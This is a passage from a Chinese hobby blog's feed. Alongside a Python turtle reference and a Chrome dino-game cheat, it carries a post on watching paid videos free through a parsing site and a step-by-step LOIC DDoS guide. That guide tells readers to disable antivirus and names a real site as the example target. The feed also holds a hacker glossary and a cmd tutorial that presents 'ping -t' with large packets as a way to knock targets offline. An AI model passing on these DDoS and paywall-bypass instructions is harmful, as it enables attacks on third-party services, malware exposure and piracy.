href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.shapesize"><code>shapesize()</code></a> | <a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.turtlesize"><code>turtlesize()</code></a> 形状大小<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.shearfactor"><code>shearfactor()</code></a> 剪切因子<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.settiltangle"><code>settiltangle()</code></a> 设置倾角<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.tiltangle"><code>tiltangle()</code></a> 倾角<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.tilt"><code>tilt()</code></a> 倾斜<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.shapetransform"><code>shapetransform()</code></a> 变形<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.get_shapepoly"><code>get_shapepoly()</code></a> 获取形状多边形</p></li><li><p>使用事件</p><p><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.onclick"><code>onclick()</code></a> 当鼠标点击<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.onrelease"><code>onrelease()</code></a> 当鼠标释放<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.ondrag"><code>ondrag()</code></a> 当鼠标拖动</p></li><li><p>特殊海龟方法</p><p><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.begin_poly"><code>begin_poly()</code></a> 开始记录多边形<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.end_poly"><code>end_poly()</code></a> 结束记录多边形<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.get_poly"><code>get_poly()</code></a> 获取多边形<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.clone"><code>clone()</code></a> 克隆<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.getturtle"><code>getturtle()</code></a> | <a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.getpen"><code>getpen()</code></a> 获取海龟画笔<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.getscreen"><code>getscreen()</code></a> 获取屏幕<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.setundobuffer"><code>setundobuffer()</code></a> 设置撤消缓冲区<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.undobufferentries"><code>undobufferentries()</code></a> 撤消缓冲区条目数</p></li></ul><h3 id="TurtleScreen-Screen-方法"><a href="#TurtleScreen-Screen-方法" class="headerlink" title="TurtleScreen/Screen 方法"></a>TurtleScreen/Screen 方法</h3><ul><li><p>窗口控制</p><p><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.bgcolor"><code>bgcolor()</code></a> 背景颜色<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.bgpic"><code>bgpic()</code></a> 背景图片<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.clearscreen"><code>clearscreen()</code></a><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.resetscreen"><code>resetscreen()</code></a><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.screensize"><code>screensize()</code></a> 屏幕大小<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.setworldcoordinates"><code>setworldcoordinates()</code></a> 设置世界坐标系</p></li><li><p>动画控制</p><p><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.delay"><code>delay()</code></a> 延迟<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.tracer"><code>tracer()</code></a> 追踪<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.update"><code>update()</code></a> 更新</p></li><li><p>使用屏幕事件</p><p><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.listen"><code>listen()</code></a> 监听<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.onkey"><code>onkey()</code></a> | <a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.onkeyrelease"><code>onkeyrelease()</code></a> 当键盘按下并释放<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.onkeypress"><code>onkeypress()</code></a> 当键盘按下<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.onclick"><code>onclick()</code></a> | <a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.onscreenclick"><code>onscreenclick()</code></a> 当点击屏幕<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.ontimer"><code>ontimer()</code></a> 当达到定时<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.mainloop"><code>mainloop()</code></a> | <a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.done"><code>done()</code></a> 主循环</p></li><li><p>设置与特殊方法</p><p><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.mode"><code>mode()</code></a><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.colormode"><code>colormode()</code></a> 颜色模式<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.getcanvas"><code>getcanvas()</code></a> 获取画布<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.getshapes"><code>getshapes()</code></a> 获取形状<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.register_shape"><code>register_shape()</code></a> | <a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.addshape"><code>addshape()</code></a> 添加形状<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.turtles"><code>turtles()</code></a> 所有海龟<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.window_height"><code>window_height()</code></a> 窗口高度<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.window_width"><code>window_width()</code></a> 窗口宽度</p></li><li><p>输入方法</p><p><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.textinput"><code>textinput()</code></a> 文本输入<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.numinput"><code>numinput()</code></a> 数字输入</p></li><li><p>Screen 专有方法</p><p><a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.bye"><code>bye()</code></a> 退出<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.exitonclick"><code>exitonclick()</code></a> 当点击时退出<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.setup"><code>setup()</code></a> 设置<a href="https://docs.python.org/zh-cn/3/library/turtle.html#turtle.title"><code>title()</code></a> 标题</p></li></ul><h1 id="2-0-使用方法"><a href="#2-0-使用方法" class="headerlink" title="2.0 使用方法"></a>2.0 使用方法</h1><p style="color:blue">NO.1（基本）</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> turtle </span><br><span class="line"><span class="comment"># 我是注释，import turtle是定义turtle的库</span></span><br><span class="line">turtle.fd(<span class="number">50</span>)</span><br><span class="line"><span class="comment"># 因为上面定义了这个库，所以以后都要用“turtle.xxx”来执行命令（即上文所说的各种语句）</span></span><br></pre></td></tr></table></figure><p style="color:blue">NO.2（精简）</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> turtle <span class="keyword">as</span> t</span><br><span class="line"><span class="comment"># 这里是将定义turtle库定义成t，这是缩写，可以简化代码量，以后可以只用“t.xxx”来调用</span></span><br><span class="line"><span class="comment"># 例如：</span></span><br><span class="line">t.fd(<span class="number">50</span>)</span><br></pre></td></tr></table></figure>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;0-1-导言&quot;&gt;&lt;a href=&quot;#0-1-导言&quot; class=&quot;headerlink&quot; title=&quot;0.1 导言&quot;&gt;&lt;/a&gt;0.1 导言&lt;/h1&gt;&lt;p&gt;python是一个简单易懂的语言，并且有一个非常有趣的库—-turtle库，它可以帮你绘画，本期博客我来归纳</summary>
      
    
    
    
    <category term="后端" scheme="http://example.com/categories/%E5%90%8E%E7%AB%AF/"/>
    
    
    <category term="python" scheme="http://example.com/tags/python/"/>
    
  </entry>
  
  <entry>
    <title>谷歌浏览器小恐龙被虐</title>
    <link href="http://example.com/2022/01/15/%E8%B0%B7%E6%AD%8C%E6%B5%8F%E8%A7%88%E5%99%A8%E5%B0%8F%E6%81%90%E9%BE%99%E8%A2%AB%E8%99%90/"/>
    <id>http://example.com/2022/01/15/%E8%B0%B7%E6%AD%8C%E6%B5%8F%E8%A7%88%E5%99%A8%E5%B0%8F%E6%81%90%E9%BE%99%E8%A2%AB%E8%99%90/</id>
    <published>2022-01-15T04:51:08.000Z</published>
    <updated>2022-01-15T05:14:08.205Z</updated>
    
    <content type="html"><![CDATA[<h1 id="0-1前言"><a href="#0-1前言" class="headerlink" title="0.1前言"></a>0.1前言</h1><p>如果你是chrome粉，一定会知道chrome（谷歌浏览器）的一个小彩蛋：dino，在断网的时候可以玩的小恐龙跳跃游戏，如图所示：</p><img src="https://s2.loli.net/2022/01/15/W41MrIjGlsebqS9.png" alt="2345截图20220115125314.png" style="zoom:150%;" /><p><img src="https://s2.loli.net/2022/01/15/etWQODdbvmTUqY7.gif" alt="R-C.gif"></p><p>按下空格跳跃躲避仙人掌，过一段时间会加分</p><h1 id="0-2悲惨经历"><a href="#0-2悲惨经历" class="headerlink" title="0.2悲惨经历"></a>0.2悲惨经历</h1><p>对于我一个手残党来说，小恐龙撞向仙人掌的次数已经数不胜数了qwq，为了挽救我的尊严，我决定</p><p><del>把小恐龙炖了</del></p><img src="https://s2.loli.net/2022/01/15/qhlEiz157cWxfj9.jpg" alt="R-C.jpg" style="zoom:67%;" /><p>众所周知，我是一个很勇的人，通过各种资料的查询，我找到了虐小恐龙的办法</p><p><del>都你们玩的，其实是开挂</del></p><h1 id="1-0-打开方式"><a href="#1-0-打开方式" class="headerlink" title="1.0 打开方式"></a>1.0 打开方式</h1><p>打开谷歌浏览器，在空白页输入<img src="https://s2.loli.net/2022/01/15/5HanmAuNEjbh3FV.png" alt="2345截图20220115130024.png"></p><p>按下回车，进入游戏界面按下空格就可以玩啦qwq</p><h1 id="2-0-F12"><a href="#2-0-F12" class="headerlink" title="2.0 F12"></a>2.0 F12</h1><p>鼠标点击页面（只是确保当前是浏览器，也可以跳过该步骤），按下键盘上的F12键</p><p>点击控制台，你们的可能是console</p><p><img src="https://s2.loli.net/2022/01/15/l6OUcNGy7goYWHu.png" alt="2345截图20220115130229.png"></p><p>在这里点击后就可以输入以下开挂的javascript代码了</p><p><img src="https://s2.loli.net/2022/01/15/Gci1smafj2SryNt.png" alt="2345截图20220115130333.png"></p><h1 id="3-0-代码"><a href="#3-0-代码" class="headerlink" title="3.0 代码"></a>3.0 代码</h1><p style="color:blue">NO.1 不死之身</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Runner.instance_.gameOver=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;&#125;</span><br></pre></td></tr></table></figure><p style="color:blue">NO.2 加速</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Runner.instance_.setSpeed(<span class="number">999</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="4-0-交互"><a href="#4-0-交互" class="headerlink" title="4.0 交互"></a>4.0 交互</h1><p><img src="https://s2.loli.net/2022/01/15/l2qw6E9GdkPAnXb.png" alt="2345截图20220115130740.png"></p><p>以上代码可以自行复制，别忘了按下回车</p><h1 id="5-0-原理"><a href="#5-0-原理" class="headerlink" title="5.0 原理"></a>5.0 原理</h1><p>F12的审查元素我就不讲了，讲一下代码：</p><p>NO.1不死之身其实就是将游戏里的gameOver函数写入空白，这样就不会判定何为游戏失败</p><p>NO.2加速其实就是定义一下runner的成员速度变量，里面的参数自己调</p><h1 id="6-0结语"><a href="#6-0结语" class="headerlink" title="6.0结语"></a>6.0结语</h1><p>chrome里的小恐龙这么可爱，别玩坏了喔~</p><p><img src="https://s2.loli.net/2022/01/15/ZVgb7AJGzk4NPWH.jpg" alt="cc11728b4710b912bbe88d8ac4fdfc039245229c.jpg"></p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;0-1前言&quot;&gt;&lt;a href=&quot;#0-1前言&quot; class=&quot;headerlink&quot; title=&quot;0.1前言&quot;&gt;&lt;/a&gt;0.1前言&lt;/h1&gt;&lt;p&gt;如果你是chrome粉，一定会知道chrome（谷歌浏览器）的一个小彩蛋：dino，在断网的时候可以玩的小恐龙跳跃游</summary>
      
    
    
    
    <category term="前端" scheme="http://example.com/categories/%E5%89%8D%E7%AB%AF/"/>
    
    
    <category term="chrome" scheme="http://example.com/tags/chrome/"/>
    
  </entry>
  
  <entry>
    <title>免费观看vip视频教程</title>
    <link href="http://example.com/2022/01/15/%E5%85%8D%E8%B4%B9%E8%A7%82%E7%9C%8Bvip%E8%A7%86%E9%A2%91%E6%95%99%E7%A8%8B/"/>
    <id>http://example.com/2022/01/15/%E5%85%8D%E8%B4%B9%E8%A7%82%E7%9C%8Bvip%E8%A7%86%E9%A2%91%E6%95%99%E7%A8%8B/</id>
    <published>2022-01-15T04:16:30.000Z</published>
    <updated>2022-01-16T04:33:46.035Z</updated>
    
    <content type="html"><![CDATA[<h1 id="0-1前言"><a href="#0-1前言" class="headerlink" title="0.1前言"></a>0.1前言</h1><p>很多人会为了自己喜欢看的电影而在某些网站上充值vip，事实上，看这些收费视频只需要一些解析网站，本期博客来介绍一下</p><h1 id="1-0-过程"><a href="#1-0-过程" class="headerlink" title="1.0 过程"></a>1.0 过程</h1><p>这里推荐解析网站：</p><p><a href="http://jx.itxm.net/">http://jx.itxm.net/</a></p><p><img src="https://s2.loli.net/2022/01/15/C6RdiKseQh9HqPf.png" alt="2345截图20220115122005.png"></p><p>比如我从爱奇艺上看的电影，将地址放入输入框，点击按钮play</p><h1 id="2-0其它"><a href="#2-0其它" class="headerlink" title="2.0其它"></a>2.0其它</h1><p>除此之外还可以用python爬虫……</p><h1 id="3-0-iframe内联框架"><a href="#3-0-iframe内联框架" class="headerlink" title="3.0 iframe内联框架"></a>3.0 iframe内联框架</h1><iframe src="http://jx.itxm.net/" height="1000"></iframe><p>如果实在不行可以去原网页观看</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;0-1前言&quot;&gt;&lt;a href=&quot;#0-1前言&quot; class=&quot;headerlink&quot; title=&quot;0.1前言&quot;&gt;&lt;/a&gt;0.1前言&lt;/h1&gt;&lt;p&gt;很多人会为了自己喜欢看的电影而在某些网站上充值vip，事实上，看这些收费视频只需要一些解析网站，本期博客来介绍一下&lt;</summary>
      
    
    
    
    <category term="前端" scheme="http://example.com/categories/%E5%89%8D%E7%AB%AF/"/>
    
    
    <category term="视频解析" scheme="http://example.com/tags/%E8%A7%86%E9%A2%91%E8%A7%A3%E6%9E%90/"/>
    
  </entry>
  
  <entry>
    <title>低轨道离子炮说明书</title>
    <link href="http://example.com/2022/01/14/%E4%BD%8E%E8%BD%A8%E9%81%93%E7%A6%BB%E5%AD%90%E7%82%AE-%E8%AF%B4%E6%98%8E%E4%B9%A6/"/>
    <id>http://example.com/2022/01/14/%E4%BD%8E%E8%BD%A8%E9%81%93%E7%A6%BB%E5%AD%90%E7%82%AE-%E8%AF%B4%E6%98%8E%E4%B9%A6/</id>
    <published>2022-01-14T09:04:01.000Z</published>
    <updated>2022-01-14T09:32:50.375Z</updated>
    
    <content type="html"><![CDATA[<h1 id="低轨道离子炮说明书"><a href="#低轨道离子炮说明书" class="headerlink" title="低轨道离子炮说明书"></a>低轨道离子炮说明书</h1><h1 id="0-1前言"><a href="#0-1前言" class="headerlink" title="0.1前言"></a>0.1前言</h1><p>众所周知，loic是一种测试网络压力的实用工具，由于性能好，被用于ddos攻击，下面我来介绍一下具体使用方法</p><h1 id="0-2声明"><a href="#0-2声明" class="headerlink" title="0.2声明"></a>0.2声明</h1><p style="color:red;font-size:large">切勿用于非法用途，本站不承担任何责任</p><h1 id="0-3截图"><a href="#0-3截图" class="headerlink" title="0.3截图"></a>0.3截图</h1><p><img src="https://s2.loli.net/2022/01/14/qjtl9JQzUXwyxbW.png" alt="2345截图20220113193416.png"></p><h1 id="1-0-UI介绍"><a href="#1-0-UI介绍" class="headerlink" title="1.0 UI介绍"></a>1.0 UI介绍</h1><p><strong>loic分为三个部分</strong>   </p><ol><li>攻击目标选择及信息</li><li>攻击及停止按钮</li><li>攻击方式及相关参数</li></ol><p>另外，loic还有   <del>贴心的提示（滑稽</del></p><p><img src="https://s2.loli.net/2022/01/14/PocRfSECenWtDH6.png" alt="2345截图20220114171137.png"></p><p>哈哈哈，这是真的，比如不在输入框中填写攻击方式就会<del>有好的提示</del></p><p style="color:red">这个是下载地址</p><p><a href="https://sourceforge.net/projects/loic/">https://sourceforge.net/projects/loic/</a></p><p><strong>（这里是说文件有木马，实际上只是黑客工具罢了，必须把各种杀毒软件关掉再打开）</strong></p><h1 id="2-0-过程"><a href="#2-0-过程" class="headerlink" title="2.0 过程"></a>2.0 过程</h1><p style="color:blue;font-size:large">NO.1</p><p><img src="https://s2.loli.net/2022/01/14/ZjWk9gNFvRLV6M3.png" alt="2345截图20220114171418.png"></p><p><strong>目标地址</strong>：</p><ul><li>url: 例如:<a href="http://www.baidu.com/">http://www.baidu.com</a></li><li>ip: <del>没有例如，可以查询以下网站</del></li></ul><p><a href="http://ip138.com/">ip地址查询网站传送门</a></p><p style="color:green;font-size:medium">注意：以上为两条分支，只能二选一，填上后请点击“Lock on”</p><p><img src="https://s2.loli.net/2022/01/14/AqCpMr5BKhmiksJ.png" alt="2345截图20220114172109.png"></p><p>当然，上传后这里的NONE会变成地址</p><p style="color:blue;font-size:large">NO.2</p><p><img src="https://s2.loli.net/2022/01/14/QkFTKmRvidxuDAn.png" alt="2345截图20220114172205.png"></p><p><strong>这里是控制的UI，method是攻击方式，有udp、tcp、、http（通常是http）</strong>     </p><p><strong>右边有ddos速度条，可以实时调整</strong></p><p><img src="https://s2.loli.net/2022/01/14/DNIf4oWy9LFEkmT.png" alt="2345截图20220114172432.png"></p><p>点击攻击，第二次点击是停止</p><p style="color:blue;font-size:large">NO.3</p><p><img src="https://s2.loli.net/2022/01/14/3u4wfs7NAxYrPVI.png" alt="2345截图20220114172635.png"></p><p>这个是各种参数面板，如果能看得懂的话可以对比一下数据</p><p><img src="https://s2.loli.net/2022/01/14/d8e4kBsqQfb3vR2.png" alt="2345截图20220114172801.png">这个地方会显示网站状态</p><h1 id="3-0-结语"><a href="#3-0-结语" class="headerlink" title="3.0 结语"></a>3.0 结语</h1><p>ddos攻击常见工具还有hoic、xoic，网站需要购买防火墙或开启cdn加速才能有效防止攻击，以后的教程会更新</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;低轨道离子炮说明书&quot;&gt;&lt;a href=&quot;#低轨道离子炮说明书&quot; class=&quot;headerlink&quot; title=&quot;低轨道离子炮说明书&quot;&gt;&lt;/a&gt;低轨道离子炮说明书&lt;/h1&gt;&lt;h1 id=&quot;0-1前言&quot;&gt;&lt;a href=&quot;#0-1前言&quot; class=&quot;header</summary>
      
    
    
    
    <category term="工具" scheme="http://example.com/categories/%E5%B7%A5%E5%85%B7/"/>
    
    
    <category term="DDOS" scheme="http://example.com/tags/DDOS/"/>
    
  </entry>
  
  <entry>
    <title>黑客常用术语</title>
    <link href="http://example.com/2022/01/03/%E9%BB%91%E5%AE%A2%E5%B8%B8%E7%94%A8%E6%9C%AF%E8%AF%AD/"/>
    <id>http://example.com/2022/01/03/%E9%BB%91%E5%AE%A2%E5%B8%B8%E7%94%A8%E6%9C%AF%E8%AF%AD/</id>
    <published>2022-01-03T12:05:02.000Z</published>
    <updated>2022-01-03T12:26:02.373Z</updated>
    
    <content type="html"><![CDATA[<h1 id="导言"><a href="#导言" class="headerlink" title="导言"></a>导言</h1><p><strong>本期博客非常轻松易懂，下面是黑客常用术语</strong></p><h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><p><strong>远控</strong></p><p>很流行的一类工具，其中最著名的是灰鸽子，远控最主要的功能就是控制电脑，一般用来做企业电脑批量管理，学校机房，网吧等，但是被黑客利用后，出现了很多新功能，比如键盘记录，偷看视频等，从某种意义上来说是严重违法的行为，随着杀毒软件的升级，和对此类软件的打击，现在玩远控的人越来越少了。</p><p><strong>肉鸡</strong></p><p>所谓“肉鸡”是一种很形象的比方，用来比作那些能够随意被我们操控的电脑或服务器。也就是被远控软件控制的机器。</p><p><strong>木马</strong></p><p>就是那些表面上伪装成了正常的程序，可是当这些被程序运行时，就会获得电脑的整个操控权限。有很多<a href="https://www.xf1433.com/">黑客</a>就是用木马来对电脑进行破坏的，例如远控要控制电脑的前提就是先生成木马，然后想办法让对方运行，就能进行控制。 </p><p><strong>网页木马</strong></p><p>表面上伪装成一般的网页文件，但是把病毒代码直接插入到正常的网页文件中，当有人访问时，网页木马就会执行相应的漏洞代码进行破坏。例如有人访问色情网站，发现cpu很高，实际上里面调用了挖矿的代码，当你访问网站时会利用你的电脑进行挖矿。</p><p><strong>挂马</strong></p><p>就是在别人的网站文件里面放入网页木马，将恶意代码插入到对方正常的网页文件里，以使阅读者中马，挂马是形容一种操作行为，不是一种技术。</p><p><strong>后门</strong></p><p>这是一种形象的比方，比如你想下载个腾讯qq，但是在网上下载到不是官方的文件，而是别人先把病毒文件绑定在正常的文件里，当打开时会中毒，通常这种病毒称为后门，因为受害者无法发现。</p><p><strong>弱口令</strong></p><p>指那些密码强度不够，容易被猜解的密码，类似123456，abc123，abcdefg，woainixiaofeng这样的口令（密码） ，是黑客常见的入侵手段，100个密码就有20个左右是这种弱密码。</p><p><strong>shell</strong></p><p>指的是一种指令执行环境，比方我们按下键盘上的“windows键+R”时出现“运行”对话框，在里面输入“cmd”会呈现一个可以运行命令的黑窗口，这个窗口大家基本上都用过，或者在黑客电影里看过，这个就是Windows的Shell执行环境。以前没有鼠标只有键盘的时候，就是靠这个完成全部电脑操作的！</p><p><strong>WebShell</strong></p><p>WebShell就是以asp、php、jsp等网页文件方式存在的一种命令环境，也能够将其称做是一种网页后门。黑客在入侵了一个网站后，一般会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，一般会藏得比较深，因为不能被管理员发现，被删除就不能获得网站控制权了。一个网站被挂上webshell后门，基本上可以为所欲为，想修改网站任何部分或者删除都可以。黑客之间的网站交易就是以webshell进行的，例如我花多少钱买这个网站的webshell权限，而攻击者负责想办法在这个网站里面放上webshell后门，这样说大家应该明白了。</p><p><strong>注入</strong></p><p>随着B/S结构开发的网站环境，基本上全部的网站都需要数据库。用户能够提交一段数据库查询代码，根据程序回来的结果，获得某些他想要知的数据，这是正常的情况，但是在查询语句中修改为有恶意攻击的代码，就具有破坏性，这个就是所谓的SQL注入，最具攻击性的网页漏洞，让无数企业站被入侵的罪魁祸首。 </p><p><strong>注入点</strong></p><p>是指能够实行sql注入的地方，一般是带有参数的网页地址。根据注入点数据库的帐号权限的不同，你所得到的权限也不同。 </p><p><strong>内网</strong></p><p>通俗的讲就是局域网，比方网吧，校园网，公司内部网等都属于此类。查看IP地址如果是在以下三个范围之内的话，就说明我们是处于内网之中的：10.0.0.0—10.255.255.255，172.16.0.0—172.31.255.255，192.168.0.0—192.168.255.255。</p><p><strong>外网</strong></p><p>直接连入internet（互联网），能让任何一台电脑相互访问，外网需要接入宽带才能实现。</p><p><strong>免杀</strong></p><p>就是通过加壳、加密、修改特征码、加花指令等等操作来改变程序，使其逃过杀毒软件的查杀。我们前面说的远控生成的木马，往往会被杀毒软件发现，不能达到控制电脑的效果，所以需要利用免杀技术来逃避杀毒软件的扫描，让杀毒软件误以为是安全的软件，从而不进行拦截。 </p><p><strong>加壳</strong></p><p>就是运用特别的算法，将exe可执行程序或许DLL动态链接库文件的编码进行改变（比方实现压缩、加密），以到达缩小文件体积和加密程序编码，甚至是躲过杀毒软件查杀的意图。目前较常用的壳有UPX，ASPack、PePack、PECompact、UPack、免疫007等等。 加壳另外一个重要的作用就是防止软件被破解，有攻就有防嘛！</p><p><strong>花指令</strong></p><p>就是几句汇编指令，让汇编语句进行一些跳转，使得杀毒软件不能正常的判断病毒文件的结构。说通俗点就是”杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置，杀毒软件就找不到病毒了。</p><p><strong>路由器</strong><br>用来上网的设备，以前用宽带线直接连接电脑输入密码就能上网，现在电脑为什么都要连接路由器呢？因为手机需要连接路由器的wifi来上网啊，所以宽带线去连路由器了，电脑没宽带线了，就只能去连接连接路由器了。</p><p><strong>端口</strong><br>要网络上，知道一台电脑的ip地址，仅仅相当于知道了它的居住地址，要和它进行通讯，我们还要知道它开了哪些端口，比方说我们到一家医院，挂号要到1号窗口，划价要到2号窗口，取药要到3号窗口.那么与计算机的通讯也是一样的，要访问小风教程网，你得与小风教程网服务器的80端口进行联系，要ftp登陆空间，传输文件，我们又得服务器的21端口连接了，所以说，端口就是一种数据的传输通道，用于接收某些数据，然后传给相应的回复，而电脑将这些数据处理后，再将相应的回复通过端口传给对方。</p><p><strong>ip地址</strong><br>互联网上的电脑有很多，为了让他们能够彼此识别，互联网上的每一台主机都分配有一个仅有的32位地址，该地址称为ip地址，也称作互联网地址，ip地址由4个数值部分组成，每个数值部分可取值0-255，每个ip地址都有256x256-1=65535个端口。</p><h1 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h1><p>懂了一些基本用语，相信你会在这条路上越走越远，加油吧！</p><h1 id="文献参考"><a href="#文献参考" class="headerlink" title="文献参考"></a>文献参考</h1><p>小风教程网</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;导言&quot;&gt;&lt;a href=&quot;#导言&quot; class=&quot;headerlink&quot; title=&quot;导言&quot;&gt;&lt;/a&gt;导言&lt;/h1&gt;&lt;p&gt;&lt;strong&gt;本期博客非常轻松易懂，下面是黑客常用术语&lt;/strong&gt;&lt;/p&gt;
&lt;h1 id=&quot;正文&quot;&gt;&lt;a href=&quot;#正文&quot; cl</summary>
      
    
    
    
    <category term="攻防" scheme="http://example.com/categories/%E6%94%BB%E9%98%B2/"/>
    
    
    <category term="黑客" scheme="http://example.com/tags/%E9%BB%91%E5%AE%A2/"/>
    
  </entry>
  
  <entry>
    <title>cmd详解</title>
    <link href="http://example.com/2022/01/03/cmd%E8%AF%A6%E8%A7%A3/"/>
    <id>http://example.com/2022/01/03/cmd%E8%AF%A6%E8%A7%A3/</id>
    <published>2022-01-03T11:57:19.000Z</published>
    <updated>2022-01-03T12:25:48.730Z</updated>
    
    <content type="html"><![CDATA[<h1 id="导言"><a href="#导言" class="headerlink" title="导言"></a>导言</h1><p>刚入门的黑客，都<strong>必须</strong>要学会cmd，而cmd并不难理解，只是背诵记忆的较多，学习cmd可以为以后入侵、拿权限奠定坚实的基础。</p><p>不过呢，人都是懒惰的<del>我也是</del>，所以，我会尽可能简化去呈现给大家</p><p><del>这样我也可以少打点字</del></p><h1 id="1-ping"><a href="#1-ping" class="headerlink" title="1.ping"></a>1.ping</h1><blockquote><p>它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。</p></blockquote><h2 id="t"><a href="#t" class="headerlink" title="-t"></a>-t</h2><p>在ping后面输入-t，即</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping -t </span><br></pre></td></tr></table></figure><p><strong>作用</strong>：不断向目标发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。　　</p><h2 id="l"><a href="#l" class="headerlink" title="-l"></a>-l</h2><p><strong>作用</strong>：定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。</p><h2 id="n"><a href="#n" class="headerlink" title="-n"></a>-n</h2><p><strong>作用</strong>：定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。</p><p>tip：以上可以连用，如：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ping IP -t -n 3</span><br></pre></td></tr></table></figure><p>我这里写的“IP”和”3”都是参数，自己填写，我只是打个比方  </p><blockquote><p>说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如”ping IP -t -n 3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。</p></blockquote><h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h3><blockquote><p>这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统，之所以说”初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。<br><strong>（小知识：如果TTL=128，则表示目标主机可能是Win2000；如果TTL=250，则目标主机可能是Unix）</strong><br>至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对别人进行ping攻击……这些就靠大家自己发挥了</p></blockquote><img 